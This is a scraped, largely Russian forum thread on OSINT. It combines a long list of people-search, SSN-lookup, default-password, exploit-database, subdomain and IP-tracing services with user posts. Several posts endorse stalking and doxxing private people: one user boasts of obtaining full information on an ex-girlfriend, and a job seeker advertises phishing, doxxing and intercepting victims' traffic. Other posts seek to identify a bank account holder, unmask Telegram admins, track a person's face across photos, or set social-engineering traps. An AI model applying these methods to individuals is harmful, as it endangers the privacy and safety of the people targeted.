огромную базу данных профилей в социальных сетях, историю адресов, контактную информацию.... * 411: Поиск людей в Соединенных Штатах, параметр поиска включает полное имя, местоположение, обратный поиск телефо. * Умные люди: поиск людей по их имени, телефону, адресу или электронной почте. * Пропустить легкость * Спокео * TruePeopleSearch * Поиск в США * заглянуть * Zaba Search: Найдите людей в США по имени или номеру телефона. * Белые страницы: поиск людей в США по имени, номеру телефона, месту работы или адресу. * Проверено: поиск людей в США по имени, телефону, электронной почте или почтовому адресу. * Поиск по адресу: поиск чьей-либо электронной почты или почтового адреса. * Ясни * Моя жизнь * Anywho: поиск людей, мест и предприятий. Вы можете искать по имени, адресу или номеру телефона. * intelius: поиск людей и телефонных номеров. * Snoop Station: поиск людей по полному имени и местоположению. Коммерческая служба. * Семейное древо сейчас * Радарис * Информационное пространство * Cubib: Бесплатный поиск в миллионах онлайн- записей данных. * Это они * Вебмии * Сколько меня * Генеалогия * Отсортировано по имени: список ссылок на детали генеалогии, основанные на первой букве фамилии человека, упомянутые на других веб-сайтах. 22. Онлайн-реестры.
* [The Knot](https://www.theknot.com/): найдите свадебный реестр и веб-
сайт пары. * Registry Finder: поиск реестров. * Реестр Амазон * Мой реестр: глобальный онлайн-сервис регистрации подарков. * Проверено дважды 23. Проверка имени пользователя.
* [Проверить имя пользователя](http://checkusernames.com/): проверить
использование определенного имени пользователя в 160 социальных сетях. * Namechk: проверьте, используется ли указанное имя пользователя для основных доменных имен и сайтов социальных сетей. * Namecheckr: проверьте доступность домена и имени пользователя в социальных сетях в нескольких сетях. * Поиск пользователей: сканирование 45 популярных сайтов социальных сетей. * знаю * Имявин 24. Поиск по электронной почте.
Сервисы проверки электронной почты. Этот сервис проверяет, существует ли адрес электронной почты, и предоставляет другую подробную техническую информацию о нем.* [Email Permutator+](http://metricsparrow.com/toolkit/email-
permutator/): полезно угадать возможную комбинацию учетной записи электронной почты цели. * Электронное досье: дайте подробный отчет о технической проверке электронных писем. * электронная почтагиппо * Верифалия * Охотник * Проверка электронной почты: проверьте, является ли адрес электронной почты реальным. * Почтовый тестер * [Валидатор электронной почты Byte Plant](https://www.email- validator.net/) * Формат электронной почты * Перестановщик электронной почты+ * Emails4Corporations. com * Мошенничество * Анализ заголовков электронной почты Получите подробную техническую информацию, извлеченную из заголовков электронной почты, включая IP-адрес и др. 25. Поиск номера телефона.
* [Z-поиск](https://www.zlookup.com/): Международный обратный поиск
телефонов, включая сотовые телефоны. * Обратный поиск телефона * Интер800 * Сумерки * Шпионский номеронабиратель * Кто звонил * Инфо Бел * Искатель фона * Истинный звонящий * Бесплатный поиск перевозчика * Поиск телефона 26. Профиль сотрудника.
* [LinkedIn](https://www.linkedin.com/) * [Нанять на](https://recruitin.net/): сторонний веб-сайт, который
использует Google для поиска профилей в LinkedIn. * Byte: Популярный сайт вакансий на Ближнем Востоке. * Визуализация рынка * Xing: сайт деловой сети * Конечно * Элюта * Карьерист * Работа в Европе * Стеклянная дверь * Монстр * Охотник за головами * Работа * Работа сайта * Стремиться * Просто наняли * Почтовый рекрутер 27. Террористические организации.
* [Jihad Intel: База данных идентификаторов
джихада.](http://google.com/advanced_patent_search) 28. Правительственные отчеты.
* [генеалогический
банк](https://www.genealogybank.com/explore/newspapers/all): генеалогические записи, найденные в газетах. * Отсортировано по дате рождения: этот сайт использует файл Death Master по состоянию на 1 марта 2014 года. * Индексы и записи смертей с возможностью поиска в Интернете * Семейный поиск * Найти могилу * [Смерти граждан США в зарубежных странах](https://www.archives.gov/research/vital-records/american-deaths- overseas.html) * Архив некрологов * США, Департамент по делам ветеранов BIRLS Death File, 1850–2010 гг. * Мелисса * Умерший онлайн * [Национальные записи Шотландии](https://www.nrscotland.gov.uk/research/visit-us/scotlandspeople- centre/useful-websites-for-family-history-research/births-deaths-and- marriages): ссылки на государственные записи о рождениях, смертях и бракахв Шотландии и некоторых странах, таких как США и Канада. * [Найди мое прошлое](https://search.findmypast.co.uk/search-united- kingdom-records-in-birth-marriage-death-and-parish-records) * Предки 29.Уголовные и судебные записи.
* [Национальный общедоступный веб-сайт для сексуальных преступников
(NSOPW)](https://www.nsopw.gov/en) * SpotCrime: покажите карту горячих точек преступности в сотнях разных городов США. * Черная книга онлайн * Поиск заключенных: Список служб поиска заключенных в Соединенных Штатах. * Федеральное бюро тюрем * Статистика преступлений ФБР
Click to expand...
* [Рекорд недвижимости США](https://usrealtyrecords.com/)
* [Мелисса Недвижимость
записи](http://www.melissadata.com/lookups/propertyviewer.asp) * Zillow: предлагает покупку, продажу, аренду, финансирование, реконструкцию недвижимости в Соединенных Штатах. * [Рекорды титулов США](https://www.ustitlerecords.com/property- records) * [GOV. UK](https://www.gov.uk/search-property-information-land- registry) * Отчет о соседях 31.Налоговая и финансовая отчетность.
* [НДС поиск](https://vat-search.eu/) * [Поиск по базе данных налога на
недвижимость](https://otr.cfo.dc.gov/page/real-property-tax-database-search) * [Национальный архив (Великобритания)](http://www.nationalarchives.gov.uk/help-with-your- research/research-guides/taxation) * Интернет-справочник государственных документов США: содержит ссылки на общедоступные базы данных официальных веб-сайтов штатов, включая публичные налоговые отчеты граждан США. 32.Поиск по номеру социального страхования.
* S [SN Check](https://www.ssn-check.org/lookup/?state=AK&year=1936):
обратный поиск номера социального страхования (только для США) . * SSN-Verify: инструменты поиска и просмотра номеров социального страхования. 33.Другие публичные записи.
Существуют и другие типы общедоступных онлайн-записей, которые могут оказаться полезными в некоторых случаях.* [Поисковые системы](http://publicrecords.searchsystems.net/):
поисковая система общедоступных записей; он включает ссылки на премиальные базы данных (требуется оплата) . * Патентные записи США * Расширенный патентный поиск Google * Федеральная избирательная комиссия: список индивидуальных взносов, сделанных отдельными лицами, индейскими племенами, товариществами, индивидуальными предпринимателями. * Follow That Money: как деньги тратятся на федеральные выборы. * Линия политических денег: отслеживайте деньги, потраченные на политику. * ЭГДП * Data. GOV. UK * Статистика Технический след.
34.История сайта.* [Интернет-архив (Wayback Machine)](http://www.archive.org/) * [Кэшированные страницы:](http://www.cachedpages.com/) Показать
предыдущие захваты веб-сайтов на трех разных архивных веб-сайтах (кеш Google, Coral, Archive. org). * CachedView: Google Cache Browser для любой страницы в Интернете.
* [Way backpac (Инструмент)](https://github.com/jsvine/waybackpack):
это инструмент, который позволяет вам загрузить весь архив Wayback Machine для данной веб-страницы. * Архив. сегодня * WebCite: доступна только архивная история. * Библиотека Конгресса * Интернет-архив Великобритании * Портал веб-архива Стэнфорда * oldweb. today: получение заархивированных веб-страниц из различных общедоступных интернет-архивов. * Веб-архив правительства Великобритании 35. Услуги по мониторингу веб-сайтов.
* [Оповещение Google](https://www.google.com/alerts) * [Обсуждение ходока](http://www.talkwalker.com/alerts) * [Визуальный пинг](https://visualping.io/) * [Подписаться на эту страницу](https://www.followthatpage.com/) * [Смотреть эту страницу](http://www.watchthatpage.com/) * [Сканер обновлений:](https://addons.mozilla.org/en-
US/firefox/addon/update-scanner) расширение Firefox, которое отслеживает веб-страницы на наличие обновлений. 35.2. Инструменты и службы RSS.
* [RSSСова](http://www.rssowl.org/)
35.3. Инструменты зеркалирования веб-сайтов.
* [HTTrack](https://www.httrack.com/): копирование веб-сайта для
просмотра в автономном режиме. * GNU Wget: получение файлов с использованием интернет-протоколов HTTP, HTTPS, FTP и FTPS. * BlackWidow: загрузите весь сайт или его часть и можете загружать любые файлы. 35.4.Извлечение ссылок.
* [Извлечение ссылок](http://www.webtoolhub.com/tn561364-link-
extractor.aspx) * [Бесплатный экстрактор URL](http://www.bulkdachecker.com/url- extractor) * Link Gopher: это надстройка для Firefox, которая извлекает все ссылки с веб-страниц. 35.5.Определить используемые технологии.
* [Создан с помощью](https://builtwith.com/): Предоставьте подробную
техническую информацию о технологии, используемой для создания целевого веб- сайта. * Ваппалайзер * dnslytics: для поиска доменов с одинаковым идентификатором Google Analytics. 36. ИТ-устройства Учетные данные по умолчанию.
* [CIRT](https://cirt.net/passwords) * [Пароль по умолчанию](https://default-password.info/) * [Поиск пароля по
умолчанию](http://www.fortypoundhead.com/tools_dpw.asp) * Пароли маршрутизатора * Открой Сез Меня! * Хэши 37. База данных уязвимостей.
* [Эксплойт базы данных](https://www.exploit-db.com/) * [Пакетный шторм](https://packetstormsecurity.com/) * [Фокус безопасности](http://www.securityfocus.com/bid) * [Национальная база данных уязвимостей](https://nvd.nist.gov/) * [CVE-детали](https://www.cvedetails.com/) * [CVE](http://cve.mitre.org/) * [Исследования
секунии](https://secuniaresearch.flexerasoftware.com/community/research) 38. Инструменты веб-скрейпинга.
* [Common Crawl](https://commoncrawl.org/): поддерживайте открытый
репозиторий данных веб-сканирования, к которому любой может получить доступ и проанализировать его. * theHarvester: это инструмент для сбора имен субдоменов. * Извлечение веб-данных (коммерческое приложение): сбор различных типов данных, включая URL-адреса, номера телефонов и факсов, адреса электронной почты, а также информацию метатегов и основной текст. * 80legs: (коммерческие) инструменты веб- скрейпинга и облачное веб-сканирование. * agenty: облачные агенты для очистки данных, извлечения текста, распознавания текста. * Anthracite: это набор мощных инструментов веб-майнинга, объединенных в простую в использовании графическую среду. * apify: платформа для веб-скрейпинга и автоматизации для разработчиков. * artoo. js: это фрагмент кода JavaScript, предназначенный для запуска в консоли вашего браузера, чтобы предоставить вам некоторые утилиты для парсинга. * scrapy: платформа с открытым исходным кодом для совместной работы для извлечения необходимых данных с веб-сайтов. * DEiXTo * просеивание данных * Экстрактор электронной почты 39. Поиск сертификации веб-сайта.
* [Ценсис](https://censys.io/) * [Поиск сертификата](https://crt.sh/)
40. Инструменты статистики и аналитики.
* [Алекса](https://www.alexa.com/siteinfo) * [Поиск Луны](http://moonsearch.com/) * [Шпионить в Интернете](http://www.spyonweb.com/) * [W3bin](https://w3bin.com/) * [Визуальный картограф сайта](http://www.visualsitemapper.com/) * [Вкладыш сайта](http://www.siteliner.com/) * [Очистить веб-статистику](https://www.clearwebstats.com/) * [Внешний вид сайта](http://www.websiteoutlook.com/) * [Заголовки безопасности](https://securityheaders.io/)
41. Проверка репутации сайта.
* [Шахтер угроз](https://www.threatminer.org/index.php) * [URLVoid](http://www.urlvoid.com/) * [Угроза Толпа](https://www.threatcrowd.org/) * [Репутационный
авторитет](http://www.reputationauthority.org/index.php) * Sucuri SiteCheck * Джо Песочница * [Безопасный просмотр](https://developers.google.com/safe- browsing/?csw=1) * Черный список вредоносных доменов * Вредоносное ПОURL * мошенники 42. Поиск в WHOIS.
* [ICANN](https://whois.icann.org/en) * [африник](https://www.afrinic.net/) * [АПНИК](https://www.apnic.net/) * [лачник](http://www.lacnic.net/) * [Большие данные домена](https://domainbigdata.com/) * [Whoisology](https://whoisology.com/#advanced) * [Робтекст](https://www.robtex.com/) * [Кто](https://who.is/) * [Реверс](https://reverse.report/) * [Оперативная структура](https://github.com/graniet/operative-
framework) * URL-сканирование 43. Обнаружение поддоменов
* [Всего вирусов](https://www.virustotal.com/#/home/search) * [DNSdumpster](https://dnsdumpster.com/) * [Гобастер](https://github.com/OJ/gobuster) * [Блуто](https://github.com/darryllane/Bluto) * [Инструменты пентеста](https://pentest-tools.com/information-
gathering/find-subdomains-of-domain) * Подсписок3r * Amass: подробное перечисление поддоменов, написанное на Go. * SecurityTrails: обнаружение поддоменов и различные онлайн-тесты следов (связанные домены, IP-адреса и SSL) 44. Отслеживание IP-адреса.
44.1. Информация о IP-геолокации.* [IPverse](http://ipverse.net/) * [IP2Расположение](http://www.ip2location.com/demo.aspx) * [отпечатки пальцев](http://www.ipfingerprints.com/) * [БД-IP](https://db-ip.com/) * [IP-адрес](https://www.iplocation.net/) * [UTrace](http://en.utrace.de/)
44.2. Информация об IP (интернет-протоколе).
* [Ониф](https://www.onyphe.io/) * [ОТЧЕТ CIDR для IPv4](http://www.cidr-report.org/as2.0) * [IP в ASN](https://iptoasn.com/) * [Обратный поиск DNS](https://hackertarget.com/reverse-dns-lookup) * [Обратный поиск IP](https://dnslytics.com/reverse-ip) * [Тот же IP](http://www.sameip.org/) * [ОТЧЕТ CIDR для IPv6](http://www.cidr-report.org/v6) * [Инструменты IP-адреса](http://www.ipvoid.com/) * [ExoneraTor](https://exonerator.torproject.org/)
44.3.BGP (протокол пограничного шлюза).
* [BGP4](http://www.bgp4.as/tools) * [Инструментарий Hurricane Electric BGP](https://bgp.he.net/) * [Рейтинг BGP](http://bgpranking.circl.lu/) * [Поток BGP](https://bgpstream.com/): Показать глобальную карту
предупреждений о захватах, утечках и сбоях в протоколе пограничного шлюза. 44.4.Черный список IP-адресов.
* [Черный список](http://www.blocklist.de/en/index.html) * [FireHOL](http://iplists.firehol.org/) * [Каталог вредоносных IP-
адресов](https://www.projecthoneypot.org/list_of_ips.php) 45. Онлайн -карты.
45.1. Общие инструменты геопространственных исследований.* [Digital Globe](https://discover.digitalglobe.com/): Простой в
использовании инструмент для создания глобальных карт с расширенными поисковыми фильтрами. * Карты Bing: альтернатива картам Google. * Яндекс Карты: российская альтернатива Google. * Карты Baidu: китайская альтернатива Google. * Даум: Карта Корана. * N2yo: прямая трансляция с разных спутников. * Wigle: Картографирование сетей Wi-Fi по всему миру.. * BB Bike: сравните две карты, например, сравните одну и ту же карту местоположения для Bing и карту Google, чтобы увидеть разницу в целевом местоположении. * Карта газет: Список всех газет по всему миру на карте. * Геологическая служба США: поиск на карте мира с использованием различных критериев. * Google Street View: просмотр определенного места, которое должно существовать в базе данных Google Street View, как будто вы там находитесь. * Проигрыватель просмотра улиц на картах Google: отображение просмотра улиц (если доступно) между двумя точками на карте. * RouteView: еще один просмотрщик улиц на карте Google. * Открытая уличная камера: просмотр открытых уличных камер в определенном месте, где это возможно. * Zoom Earth: просматривайте международные изображения облаков, обновляемые каждый день, со спутников НАСА. * Terrapattern: это инструмент визуального поиска спутниковых изображений. * dominoc925: Показать координаты военной системы координат (MGRS) . * Mapillary: просмотр изображений улиц, загруженных людьми со всего мира. * Поиск адреса: Найдите адрес любого места на Картах Google. * Inspire Geoportal: предоставление доступа к европейским пространственным данным. * Карта для пеших и велосипедных прогулок: карта для пеших и велосипедных прогулок. * Viamichelin: Показать туристов, рестораны, отели, пробки и погоду на карте мира. * Проект corona: перечислите более 800 000 изображений, собранных спутником-шпионом corona. * Ani Maps: создавайте карты с интерактивной анимацией. * Trip Geo: создайте карту направления, используя данные Google Street View. * GRASS GIS: это программное обеспечение с открытым исходным кодом для географической информационной системы (ГИС). * Timescape: это платформа для повествования на основе карты. * Polymaps: библиотека JavaScript для создания динамических интерактивных карт в современных веб-браузерах и поддержки различных визуальных презентаций. * Mapquest: помогает вам находить места на карте. * NGA geoint: официальный репозиторий инструментов, связанных с картами, Национального агентства геопространственной разведки на GitHub. * [Бесплатные инструменты карты](https://www.freemaptools.com/radius- around-point.htm): найдите радиус вокруг точки на карте. * Maphub: создавайте интерактивную карту, добавляя точки, линии, многоугольники или метки в дополнение к настроенному фону. * Crowdmap: это инструмент аннотации, который позволяет визуализировать информацию на карте и временной шкале. * Maperitive: это программное обеспечение Windows для рисования карт на основе данных OpenStreetMap и GPS. * Коллекция карт библиотеки Перри- Кастаньеды: список онлайн- карт. * Секция геопространственной информации Организации Объединенных Наций * Roundshot: просмотр живых камер из выбранных регионов по всему миру. * Живая карта землетрясений * [Всемирный почтовый союз](http://www.upu.int/en/the-upu/member- countries.html): найдите почтовые индексы всех стран. 45.2. Коммерческие спутники.
* [Европейская космическая съемка](http://www.euspaceimaging.com/) * [Максар](https://www.maxar.com/)
45.3. Глобальная дата/время.
* [Wolframe Alpha](http://www.wolframalpha.com/): введите конкретный
город или любое место, и сайт получит важную информацию о нем. * SunCalc: показывает движение солнца в течение дня для любого заданного места на карте. * SunCalc * лунный накипь 46. Социальные сети на основе местоположения.
46.1. YouTube.* [Инструмент геопоиска](https://youtube.github.io/geo-search-
tool/search.html): это инструмент геолокационного поиска для видео с геотегами на YouTube. Вы можете искать видео по заданному адресу и в заданный период времени. 46.2.Фейсбук.
* [Facebook Live](https://www.facebook.com/live): зайдите на Facebook
live, чтобы увидеть, где в настоящее время транслируются живые видео. 46.3.Геолокация в Твиттере.
* [Tweet Mapper](https://keitharm.me/projects/tweet/): это бесплатный
сервис для составления списка всех твитов с геотегами. * One Million Tweet Map: просмотрите один миллион последних мировых твитов на карте. * Qtr Tweets: позволяет найти все твиты на определенном расстоянии от целевого местоположения на карте. * Карта твитов: Визуализируйте все твиты на глобальной карте. 46.4.Другие инструменты для геолокации в социальных сетях.
* [Strava Heat Map](https://www.strava.com/heatmap): это спортивное
приложение для измерения производительности в легкой атлетике; он работает, отслеживая спортивные действия с помощью датчика GPS, который есть в их смартфоне. 47.Отслеживание транспорта.
47.1. Воздушные движения.* [Flight Aware](https://uk.flightaware.com/): эта компания считается
крупнейшей компанией по отслеживанию полетов в мире. * Flight Radar 24: предлагает международную службу отслеживания гражданских рейсов. * Отслеживание авиагрузов: отслеживайте авиагрузы для 190 авиакомпаний. * Radar Box 24: Международный трекер самолетов. * PlaneFinder * Всемирная база данных самолетов 47.2.Морские движения.
* [Морской трафик](https://www.marinetraffic.com/) * [Отслеживание контейнеров](http://www.track-trace.com/container):
Отслеживайте контейнеры для 125 компаний, вам нужно указать только номер контейнера. * Поиск судов * Круизный картограф * Поиск кораблей * Список префиксов контейнеров * Международные идентификационные коды владельцев контейнеров (BIC Codes) * Международный код порта 47.3.Транспортные средства и железная дорога.
* [ASM](https://asm.transitdocs.com/): Отслеживание поездов в реальном
времени по США. * Время поезда: живая карта поездов лондонского метро. * апреля 47.4.отслеживание посылок.
* [После отправки](https://www.aftership.com/couriers): Отслеживайте
447 курьеров по всему миру.. * Отслеживание EX: курьер Track 235. * 17 Track: служба отслеживания посылок. * Отслеживание посылок: отслеживайте курьеров по всему миру и визуализируйте путь доставки с помощью Google Maps. * Boxoh: служба отслеживания посылок для USPS, UPS, FedEx, DHL/AirBorne. * Почта Канады * Королевская почта 48. Веб-камеры.
* [Всемирный поиск](http://world-webcams.nsspot.net/) веб-камер:
отображение доступных веб-камер со всего мира на карте Google. * Earth Cam: прямая трансляция веб-камеры из разных мест по всему миру. * Фисгония * Мировая камера * Опентопия * Мила 49. Компиляция данных IP, MAC-адресов и сервисов длякомпьютерной разведки OSINT.
1. Получение IP-данных* [HostHunter](https://github.com/SpiderLabs/HostHunter) — обнаруживает
и извлекает имена хостов из набора целевых IP-адресов; * Cyberhubarchive — Архив утечек данных, содержит IP-адреса учетных записей Skype; * spiderfoot. net — автоматический поиск с использованием огромного количества методов, но можно использовать и в облаке при регистрации; * iknowwhatyoudownload ( http://iknowwhatyoudownload. com/) — показывает, что скачивается в интернете; * recon. secapps. com — автоматический поиск и сопоставление ссылок; * check. torproject. org — находит список всех выходных узлов Tor за последние 16 часов, которые могли достичь IP; * dnslytics. com — найдет домены; * metrics. torproject. org ( https://metrics. torproject. org/exonerator. html) — проверяет, использовался ли IP-адрес в качестве хоста для трафика Tor, требуется дата; 2. Поиск данных по MAC-адресу.
* [xinit. ru](https://xinit.ru/wifi) — показывает местоположение Wi-Fi; * [alexell. ru](https://alexell.ru/network/mac-geo) — тоже покажет
местоположение. * wigle. net — находит точку доступа Wi-Fi, ее физический адрес и имя; 3. Составление сервисов для компьютерной разведки osintсписок сервисов и утилит, предназначенных для анализа таких данных, как IP, SSID, метаданные файлов, записи DNS и всего, где объектом анализа является элемент ИТ- структуры, будь то сайт или IP-адрес.
* [Urlscan. io](http://urlscan.io/) — проверяет, кому был выдан TLS-
сертификат и какие IP-адреса связаны с сайтом. * PDFCandy — сервис, позволяющий извлекать и изменять метаданные PDF. * wigle — может показывать SSID и BSSID точек доступа Wi-Fi на карте. * PublicWWW — сервис ищет информацию об исходном коде страниц. * Metadata2Go — помогает узнать все метаданные файла. * HostHunter — ищет доменные имена по набору IP-адресов. * Knock Subdomain Scan — ищет поддомены в целевом домене и может создать выходной файл с результатами. * Namechk — сайт, который найдет все аккаунты человека во всех социальных сетях.
Click to expand...
Источник :https://www.advisor-bm.com/osint-tools
Click to expand...
Чтением теории и просмотром видеогайдов на тему OSINT уже насытился. Теперь
хочется попрактиковаться нон-стоп. Находил пару не особо зашифрованных кидал
до ФИО и номера квартиры, находил 3-4 раза гео по фото/видео, на давнюю-давнюю
бывшую вообще фул инфу получил, пару одноклассников пробил чем дышат. Были и
неудачные поиски.
Сроков и гарантий не даю.
Ничего не ломаю.
Ищу только по открытым источникам.
Денег не прошу, работаю за идею.
Посоветуйте различные ресурсы по получению как можно более подробной информации о пользователе в Telegram. Можно не ограничиваться только бесплатными и только ботами в самом Telegram...
Иногда бывает, что тебе надо найти страницу. Может ты где-то раньше её видел,
а информация понадобилась только сейчас, или например ты хочешь найти данные
узкой направленность. И при этом поисковики не ищут нужный тебе сайт, даже при
использовании дорков. В этой статье я расскажу тебе два способа достичь твоей
цели.
1. Wayback Machine
Wayback Machine - это архив интернета. Он сохраняет страницы у себя на
серверах, а так же содержит записи конференций, статьи, книги, фильмы и так
далее.
Самый популярный из "архивов" - archive.org
Мы сразу видим строку, в которой указано ввести URL или ключевые слова. Думаю
дальше объяснять не стоит, просто вбиваем данные и ждём результат.
Часто бывает, что в одном архиве страница есть - в другом нет. Поэтому советую
поискать ещё 5-10 таких ресурсов для повышения возможности получить результат.
2. "Брутфорс" поддоменов.
Но иногда бывает, что страница не была архивирована. Тогда, если у вас есть
главный домен, можно угадать адрес поддомена. Для этого требуется изучить их
структуру(поддоменов). Чаще всего она имеет такой вид :
1. Слова в адресе обозначают перевод фактической темы сайта на английский.
Пример : https://probiv.app/members/
2. В адресе нет слов, все страницы пронумерованы.
3. Слова написаны транслитом с русского на английский. Пример :
https://ssu.gov.ua/kontrrozvidka
4 . Слова обозначают фактическое содержание страницы. Пример :
https://www.open.ru/small
5. Смешанный формат
Если заморочиться, можно даже написать скрипт для подбора URL.
Интересный факт :
URL таких частей сайтов, как статьи, посты и так далее почти всегда пишутся
транслитом. Статьи, допустим на telegraph тоже.
Думаю владельцы сайтов поняли, какие меры им стоит принять, чтобы надёжнее
ограничить доступ к приватным страницам.
Просьба оставить комментарий, что можно рассказать ещё в этой статье и какие
статьи написать. (Хочется увеличить объём и довести до уровня "Хакера", но
идей нет.
Спасибо за внимание!
При регистрации на большинстве крупных бирж и обменников вы должны будете пройти процедуры KYC (Know Your Client) и AML (Anti-Money Laundering). Строгая привязка аккаунта к личности и проверка биржей входящих средств на предмет чистоты вынуждает проводить собственные расследования.
Еще критичнее информация об источниках происхождения криптовалюты и путях ее вывода в фиат становится при исследовании адресов злоумышленников или проверке потенциальных партнёров.
Ввиду того, что профильный инструментарий типа Chainalysis фактически недоступен простым смертным из-за высокой цены, а руками проверять тысячи транзакций затруднительно, можно использовать AMLBot.
Доступно две версии: в самом телеграме (@cryptoaml_bot) и веб-версия по адресу https://amlbot.com/ru/.
У него есть два режима работы: проверка и расследование.
В режиме проверки после ввода адреса бот сгенерирует небольшой отчет с характеристикой чистоты средств.
Разберем подробнее каждый источник средств:
Exchange With Low ML Risk обозначает биржу или обменник, где необходимо пройти процедуры KYC\AML вне зависимости от суммы ввода или вывода.
Marketplace это организация, предлагающая легальную покупку криптовалюты.
Wallet — монеты, которые до перевода на целевой адрес хранились на надежных кошельках.
Exchange ML Risk Moderate\High обозначает биржу или обменник, где нет KYC\AML при выводе до\свыше 2000$ в день соответственно.
P2P Exchange With Low ML Risk — p2p-обменник, где для транзакций свыше 1000$ в день не нужно проходить KYC\AML.
Gambling — здесь все и так понятно)
Всего AML Bot выделяет 20 разных источников средств, от рансомных денег и наркошопов до средств, заработанных с помощью майнинга. В каждом отчете в конце будет предоставлена подробная легенда, ее также можно посмотреть по ссылке.
Если же нам нужен подробный отчет с указанием конкретных сервисов, то следует воспользоваться поиском в режиме расследования. В этот раз в качестве вводных данных используем BTC-адрес.
Результаты для удобства можно выгрузить в XLS-формате.
В отличие от режима проверки, расследование позволяет увидеть конкретные сервисы и суммы переводов. Отдельно выносятся непрямые связи целевого адреса: отображаются ближайшие именованные кластеры (раздел "with routing").
При желании можно выгрузить и конкретные адреса, стоящие за обнаруженными
сервисами, а также ID транзакций. Это позволит полностью отследить движение
средств на/c кластера по адресам.
При расследовании инцидентов с использованием крипты мне часто приходилось анализировать данные вручную, так как для фрилансера профильный софт не по карману. AMLBot, в отличие от, например, очень дорогого Chainalysis с блекджеком и визуализацией, дает вам возможность выбрать, насколько подробным будет расследование.
Подобная гибкость позволит сэкономить немало денег на рутинных проверках, а в случае необходимости за дополнительную плату отследить средства вплоть до транзакции между целевым кошельком и кластером.
Donate: ETH 0x8de398C8318d93c73f51DC36E24d984489a2962a
Мой канал об OSINT: https://t.me/osint_club_channel
This is not my project. Sharing here since i found this extremely useful.
"We present to your attention the development of one of the members of our community.
OffenOsint Virtual Machine - OffenOsint Virtual Machine
The system was built to eliminate the need to deploy a production-distribution from scratch when working on a new machine. It combines powerful tools for active intelligence of the Kali Linux repository, several full cycle intelligence frameworks, other most useful scripts, tools for anonymizing their actions on the network, tools for analyzing the collected data, as well as visualization tools. Plug and Play.
Has on board a Docker containerization system for the most painless launch of
complex server-side scripts, the Searx metasearch engine.
ᅠ
https://github.com/Double2Sky/OffenOsint
Compiled for OSINT. And nothing more!
Support me if you find this usefull
Предисловие и мои мысли
Знаете, в этом мире грань Анонимности стирается очень быстро, начиная с 21v,
когда мир начал уходить в интернет и системы уже к 21 году забрали много
возможностей для разведки и сбора данных для последующей продажи их 3 лицам,
но сейчас мы поговорим про Ip, вроде набор цифр для кого-то, а для кого-то это
выгодная вещь которая принесет деньги (например тот-же facebook который с
радостью продаст о вас все что накопил, или Avast).
И вот список сайтов для вас, по пробиву ip, если есть у вас свои, то можете тоже сюда закинуть в тему:
Spoiler: Сайты
Hidden content for authorized users.
1. IP-score - сайт проверяет на наличие в
blacklists определенного IP.
2. HTMLweb - поможет определить страну, город и
район. Дополнительно есть информация о whois-server.
3. ipqualityscore - c помощью этого
сервиса можно получить информацию об использовании прокси,
VPN или TOR.
4. iknowwhatyoudownload - ресурс для
получения информации о использовании торрент трекеров. Есть возможность
создать зараженную ссылку и отправить ее.
5. xspider-77 - можно получить информацию о занятых портах и уязвимостях.
6. Shadow Security Scanner
(ссылка на скачивание программы) - определяет операционную систему, название
машины, а также дату и время на компьютере.
А потом можно использовать уже нацеленные ловушки на пользователя (лей) зная инфу и применяя соц. инженерию вместе с другими сервисами по пробиву информации.
Here for you/Здесь для вас: the 7th edition of Michael Bazzell's OSINT
Techniques.
OSINT Techniques
Привет всем, как найти админ тг канала?
Hi everyone, I have a question, is it possible to find telegram channel admin?
Hello guys! I am looking for a tool or any kind of database or OSINT tip to find a bank account owner's name, surname, address or extra any other infos.
I have the owner's account number, Iban and swift code.
Bank is: BNP Paribas Bank Polska S.A.
Any help would be great!
Вышел замечательный инструмент https://github.com/soxoj/maigret
Это форк Шерлока адаптированный для российских соцсетей
Кроме обычного поиска ников на сайтах программа может:
1. Парсить страницы аккаунтов, вытаскивать личную информацию и ссылки на
другие аккаунты
2. Автоматически искать по найденным новым никнеймам
3. Проверять наличие капчи и цензуры на сервисах.
4. Поиск по ID
5. Вычищение ложных срабатываний
Не горячая новинка, но все впереди)
Большой Привет! Ищу работу на лето, а именно - на июнь (возможно и на более
долгий срок). Сразу обозначу сумму, которую хочется заработать до июля: 100
тыс.
Основная моя деятельность - разведка на основе открытых источников.
Относительно большой опыт в OSINT и Нетсталке (Около 3-х лет).
В основном интересуюсь Физ. и Юр. лицами, но в последнее время, открываю для
себя много увлекательного.
К примеру сейчас, я начал заниматься сбором информации об объектах, офисах,
предприятиях, а также, поиском информации по самым минимальным зацепкам.
Принимал участие в разных CTF соревнованиях. Хорошие навыки в ИБ. Не один
десяток раз применялся фишинг, доксинг, сбор компрометирующей информации.
Могу осуществить поиск по абсолютно любым исходным данным. Есть опыт в
целенаправленных атаках, т.е наблюдение, перехват трафика жертвы, полный
пробив и прочее...
Большой фанат Open-Source, хорошо владею семейством BSD и GNU/Linux системами
(Более 6 лет). Junior в Python, базовые знания в C++ и RUBY.
Много свободного времени. Хочу получать много работы. От запары приобретаю
только удовольствие!
Всю вышеописанную информацию могу подтвердить! Готов выполнить тестовые
задания! Рассмотрю все предложения!
Пишите в ЛС на форум. Там уже подумаем куда нам лучше перейти.
Благодарю за внимание!
Язык: Английский
Страниц: 436
Operator Handbook содержит три дисциплины (Red Team, OSINT, Blue Team) и
объединяет их в одно полное справочное руководство.
Spoiler: Скачать:
Hidden content for authorized users.
AnonFiles ](https://anonfiles.com/X0md34ycu1/Operator_Handbook_Red_Team_OSINT_Blue_Team_Reference_pdf)
anonfiles.com
Ребята, подскажите пожалуйста на каких почтовых сервисах легче всего
зарегистрироваться без каких либо указании номера телефона или верификации
второго почты.
Важно, чтобы сервис не внесен в черный список других провайдеров или
подвергается блокировке.
Буду обновлять эту тему и создать неплохой список сервисов
Также опишите ваши подходы, чтоб перехитрить верификацию если они имеются
Чистые :
Gmail (очень зависит от IP-adress и ряд других параметров)
Yahoo
Грязные :
Guerrilla Mail
10 Minute Mail
I thinked to use "google photos" face recognition technology, uploading an
huge quantity of phots, taken from socials, searching by place, hastags, ecc
(Considering that you have no limits storage, in compressed quality) In not
much time you will be able to find a certain person in a lot of photos where
he is. [photos.google.com/people]
For more if i go to information of a specific photo, i could see if face
recognition has detected a recurring face!
(See photos
examples)
Сегодня я собрал для тебя подборку сервисов, благодаря которым, ты можешь узнать полезную информацию о цели с помощью номера кошелька. Также, ты узнаешь о полезных поисковиках, не о «Яндексе» или «Google» , а о других сервисах, которые действительно лучше, чем лидеры рынка. Пусть и не во всём.
**LTC, DASH, DOGE.
• **Blockcypher — информация о
транзакциях;
•Blockchair — информация о транзакциях;
**BTC.
• **Walletexplorer — анализ транзакций;
•Blockchair — информация о транзакциях;
